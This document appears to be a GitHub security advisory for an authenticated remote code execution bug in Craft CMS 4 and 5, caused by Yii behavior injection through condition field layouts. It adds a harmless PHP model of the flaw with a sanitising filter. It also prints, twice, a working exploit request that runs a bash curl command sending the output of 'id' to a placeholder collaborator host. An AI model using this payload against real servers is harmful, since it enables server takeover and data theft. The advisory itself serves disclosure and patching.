GHSA-QRGM-P9W5-RRFW

Vulnerability from github – Published: 2026-05-06 17:54 – Updated: 2026-05-13 16:29
Summary
Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior
Details

We identified a vulnerability in then-current Craft CMS releases (4.x before 4.17.12 and 5.x before 5.9.18): an input-handling flaw in a Yii object-creation path that lets any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii's dynamic object configuration, as used by Craft CMS, lets the application build objects from a configuration array, and that array format includes special keys that attach behaviors and event handlers to the object being built.

This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.

The request-controlled `fieldLayouts` data inside a condition is converted into a live `FieldLayout` object without passing through a `Component::cleanseConfig()` boundary. Because Craft configures models before calling `parent::__construct()`, attacker-controlled special config keys (`as <name>`, `on <event>`, `__class`, `__construct()`) take effect while the object is still being created, and `FieldLayout` initialization then fires an event in the same request, so the injected handler runs immediately rather than on some later save.

This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.
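The hydration problem described above, as an added example that is not the advisory's, Craft's or Yii's code: a small PHP model of Yii-style configuration (keys `as <name>` attach a behavior, `on <event>` register an event handler, `__class` and `__construct()` pick the class and its constructor arguments) applied to a request-supplied array, first directly and then through a `cleanseConfig()`-style filter. The class and function names (`ToyComponent`, `DemoBehavior`, `Sink`, `hydrateUnsafe`, `hydrateSafe`) and the filter's key set are this example's assumptions, and a harmless static-method callable stands in for the command-executing one in the real payload.

```php
<?php
declare(strict_types=1);
// Added example, not Craft/Yii code: a minimal model of Yii 2's config
// semantics. All class and function names here are assumptions. PHP 8.1+.

// Stand-in for Yii::createObject(): "__class" selects the class and
// "__construct()" supplies constructor arguments; both are JSON-expressible.
function createObject(array $config): object
{
    $class = $config['__class'] ?? $config['class'] ?? throw new InvalidArgumentException('no class');
    $args  = $config['__construct()'] ?? [];
    unset($config['__class'], $config['class'], $config['__construct()']);
    $object = new $class(...$args);
    foreach ($config as $name => $value) {
        $object->$name = $value;
    }
    return $object;
}

// Benign stand-in for the behavior the payload attaches.
final class DemoBehavior
{
    public function __construct(public string $label = 'default') {}
}

// Records handler invocations; plays the role of the attacker's callable.
final class Sink
{
    public static array $calls = [];

    public static function record(ToyComponent $owner): void
    {
        $classes = array_map(fn(object $b) => $b::class, $owner->behaviors);
        self::$calls[] = 'init fired; behaviors: ' . json_encode($classes);
    }
}

// Stand-in for a Craft model such as FieldLayout: the config is applied
// through __set() before construction finishes, then init() runs.
class ToyComponent
{
    public string $name = '';
    public array $behaviors = [];
    private array $handlers = [];

    public function __construct(array $config = [])
    {
        foreach ($config as $key => $value) {
            $this->__set((string) $key, $value);
        }
        $this->init();
    }

    // Simplified mirror of the dispatch in yii\base\Component::__set().
    public function __set(string $name, mixed $value): void
    {
        if (str_starts_with($name, 'on ')) {
            $this->handlers[trim(substr($name, 3))][] = $value;      // "on *" => wildcard
        } elseif (str_starts_with($name, 'as ')) {
            $this->behaviors[trim(substr($name, 3))] = createObject($value);
        } elseif (property_exists($this, $name) && (new ReflectionProperty($this, $name))->isPublic()) {
            $this->$name = $value;
        } else {
            throw new InvalidArgumentException("Unknown property: $name");
        }
    }

    // Initialisation fires an event in the same request; "*" handlers get it too.
    public function init(): void
    {
        $this->trigger('init');
    }

    private function trigger(string $event): void
    {
        foreach (array_merge($this->handlers[$event] ?? [], $this->handlers['*'] ?? []) as $handler) {
            call_user_func($handler, $this);
        }
    }
}

// Strips the keys Yii interprets specially before request data becomes an
// object (the role of Craft's Component::cleanseConfig(); key set is this
// example's choice). $removed collects the dotted paths that were stripped,
// which doubles as a detector for injection attempts in request bodies.
function cleanseConfig(array $config, array &$removed = [], string $path = ''): array
{
    foreach ($config as $key => $value) {
        $here = $path === '' ? (string) $key : "$path.$key";
        if (is_string($key) && preg_match('/^(as |on |__class$|__construct\(\)$)/', $key)) {
            $removed[] = $here;
            unset($config[$key]);
        } elseif (is_array($value)) {
            $config[$key] = cleanseConfig($value, $removed, $here);
        }
    }
    return $config;
}

function hydrateUnsafe(array $requestData): ToyComponent
{
    return new ToyComponent($requestData);                   // the vulnerable path
}

function hydrateSafe(array $requestData, array &$removed = []): ToyComponent
{
    return new ToyComponent(cleanseConfig($requestData, $removed));
}

// Constructed request fragment in the shape of the advisory's payload.
$fieldLayoutFromRequest = [
    'name'  => 'Demo layout',
    'as rce' => ['__class' => DemoBehavior::class, '__construct()' => ['attacker-chosen']],
    'on *'  => [Sink::class, 'record'],
];

Sink::$calls = [];
hydrateUnsafe($fieldLayoutFromRequest);
printf("unsafe: %d handler call(s) %s\n", count(Sink::$calls), implode(' | ', Sink::$calls));

Sink::$calls = [];
$removed = [];
$layout = hydrateSafe($fieldLayoutFromRequest, $removed);
printf("safe:   %d handler call(s); stripped: %s; name=%s\n", count(Sink::$calls), implode(', ', $removed), $layout->name);
```

Run with `php example.php`: the unsafe path records a handler invocation during construction, before the caller ever holds a reference to the object, while the cleansed path records none, keeps the legitimate `name` property and reports `as rce` and `on *` as stripped. The same recursive walk, run over the decoded JSON bodies of requests to the element-search and element-indexes actions, is a cheap way to flag this injection pattern at a WAF or during log review.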

We reproduced the attack by sending the following POST request to `/admin/actions/element-search/search` as any logged-in user. Other routes are exploitable in the same way, including the other element-indexes actions that pass through the same `beforeAction()` path. The payload makes the server issue a curl request to the chosen collaborator host with the output of `id` for the web-server user appended to the URL path:

```
POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json

{
  "elementType": "craft\\elements\\Category",
  "siteId": 1,
  "search": "",
  "condition": {
    "class": "craft\\elements\\conditions\\ElementCondition",
    "elementType": "craft\\elements\\Category",
    "fieldLayouts": [
      {
        "as rce": {
          "__class": "yii\\behaviors\\AttributeTypecastBehavior",
          "__construct()": [
            {
              "attributeTypes": {
                "typecastBeforeSave": [
                  "Psy\\Readline\\Hoa\\ConsoleProcessus",
                  "execute"
                ]
              },
              "typecastBeforeSave": "/bin/bash -c \"curl https://yourcollaboratorservergoeshere/`id`\""
            }
          ]
        },
        "on *": "self::beforeSave"
      }
    ]
  }
}
```

Resources

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3


{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.17.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.9.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44011"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470",
      "CWE-479"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T17:54:06Z",
    "nvd_published_at": "2026-05-12T21:16:15Z",
    "severity": "HIGH"
  },
  "details": "We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server.  Yii\u2019s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command \u201cid\u201d for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: \u2026\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n  \"elementType\": \"craft\\\\elements\\\\Category\",\n  \"siteId\": 1,\n  \"search\": \"\",\n  \"condition\": {\n    \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n    \"elementType\": \"craft\\\\elements\\\\Category\",\n    \"fieldLayouts\": [\n      {\n        \"as rce\": {\n          \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n          \"__construct()\": [\n            {\n              \"attributeTypes\": {\n                \"typecastBeforeSave\": [\n                  \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n                  \"execute\"\n                ]\n              },\n              \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n            }\n          ]\n        },\n        \"on *\": \"self::beforeSave\"\n      }\n    ]\n  }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
  "id": "GHSA-qrgm-p9w5-rrfw",
  "modified": "2026-05-13T16:29:16Z",
  "published": "2026-05-06T17:54:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44011"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior"
}

